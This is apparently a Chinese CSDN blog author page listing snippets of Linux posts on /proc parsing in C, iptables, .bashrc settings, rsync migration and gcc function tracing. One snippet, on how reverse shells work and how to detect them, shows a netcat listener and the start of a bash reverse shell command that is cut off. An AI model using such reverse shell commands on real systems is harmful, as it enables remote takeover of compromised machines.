![](https://img-blog.csdnimg.cn/20201014180756913.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
linux
debugkernel
这个作者很懒,什么都没留下…
展开
-
反弹shell的实现方式和检测方法
我所理解的反弹shell,是外部人员通过web或者软件的漏洞,建立了一个数据流通向网络外部的shell执行环境。现在针对一些网络上反弹shell实例作说明: 反弹shell现在针对一些网络上反弹shell实例作说明:实例1,Bash反弹:Bash反弹,远程主机监听端口:nc -lvp 7777被入侵的机器反弹shell命令如下:bash -i >&am...原创 2018-12-25 13:20:43 · 4357 阅读 · 0 评论 -
C语言环境读取/proc目录的进程信息
通过/proc目录可以获取所有的进程信息。需要注意的是 readlink系统调用不会追加0到字符串结尾,并且字符串的最大长度需要时读取长度+1,便于添加0结束字符串。#include <stdio.h>#include <string.h>#include <stdlib.h>#include <unistd.h>#inclu...原创 2019-04-04 11:19:51 · 4079 阅读 · 2 评论 -
Iptables使用小结
限速sudo iptables -I OUTPUT -d 192.168.7.6 -m limit --limit=1/s --limit-burst=1 -j ACCEPTsudo iptables -A OUTPUT -d 192.168.7.6 -j DROP原创 2019-04-11 18:27:21 · 122 阅读 · 0 评论 -
LINUX 配置,.bashrc
LINUX 配置# define environments for all usersexport PATH=$PATH:/opt/usr/binexport HISTFILESIZE=10000export HISTSIZE=2000PS1='`basename \w`\$ 'export RAMDISK="/mnt/RAMDISK"# java setupexport...原创 2019-04-22 10:10:45 · 486 阅读 · 0 评论 -
linux迁移
Linux installation migrate , copyrsync aAXv /* /path/to/backup/folder exclude={/dev/*,/proc/*,/sys/*,/tmp/*,/run/*,/mnt/*,/media/*,/lost+found}原创 2019-04-22 10:17:09 · 274 阅读 · 0 评论 -
追踪C函数执行路径
利用gcc特性,追踪函数执行路径#include <stdio.h>#include <time.h> static FILE *fp_trace; void__attribute__((__no_instrument_function__))__attribute__ ((constructor))trace_begin (void){ fp_t...原创 2019-04-24 16:32:08 · 502 阅读 · 0 评论